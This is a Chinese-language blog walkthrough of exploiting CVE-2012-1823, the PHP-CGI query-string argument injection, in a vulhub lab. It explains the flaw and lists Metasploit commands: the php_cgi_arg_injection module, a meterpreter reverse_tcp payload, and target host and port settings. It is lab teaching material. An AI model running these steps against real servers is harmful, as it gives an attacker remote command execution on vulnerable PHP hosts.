vulhub靶场php环境下的CVE-2012-1823(PHP-CGI远程代码执行漏洞)

本文介绍了CVE-2012-1823,这是一个影响php-cgi在cgi模式下运行的漏洞。该漏洞允许攻击者通过querystring传递参数,影响PHP版本低于5.3.12或5.4.2。文章详细阐述了漏洞原理,并提供了利用Metasploit进行攻击的步骤,包括设置rhost和rport来执行命令。
摘要由CSDN通过智能技术生成

简述漏洞危害

CVE-2012-1823就是php-cgi这个sapi出现的漏洞,本漏洞只出现在cgi模式运行的php中。影响范围 php < 5.3.12 或 php < 5.4.2

这个漏洞简单来说,就是用户请求的querystring被作为了php-cgi的参数,最终导致了一系列结果。

探究一下原理,RFC3875中规定,当querystring中不包含没有解码的=号的情况下,要将querystring作为cgi的参数传入。所以,Apache服务器按要求实现了这个功能。但PHP并没有注意到RFC的这一个规则,也许是曾经注意并处理了,处理方法就是web上下文中不允许传入参数。

于是就导致了php不光可以通过命令行参数的方式传入php-cgi,也可以通过querystring的方式传入。

漏洞搭建

无其他搭建必须环境

搭建环境见vulhub搭建方法 (3条消息) vulhub搭建方法_himobrinehacken的博客-CSDN博客

漏洞利用

打开msf

msfconsole

搜索目标漏洞编号

search cve-2012-1823

使用模块

use exploit/multi/http/php_cgi_arg_injection

这里提示需要使用payload并告诉我们payload的名字直接使用它

set payload php/meterpreter/reverse_tcp

查看需要配置的信息

show options

我们要配置rhost(目标靶机)rport(目标端口)

set rhost 192.168.221.129
set rport 8080

接下来配置完后直接run就可以

run

显示到这就是连接成功了,我们就能执行命令了

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

himobrinehacken

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值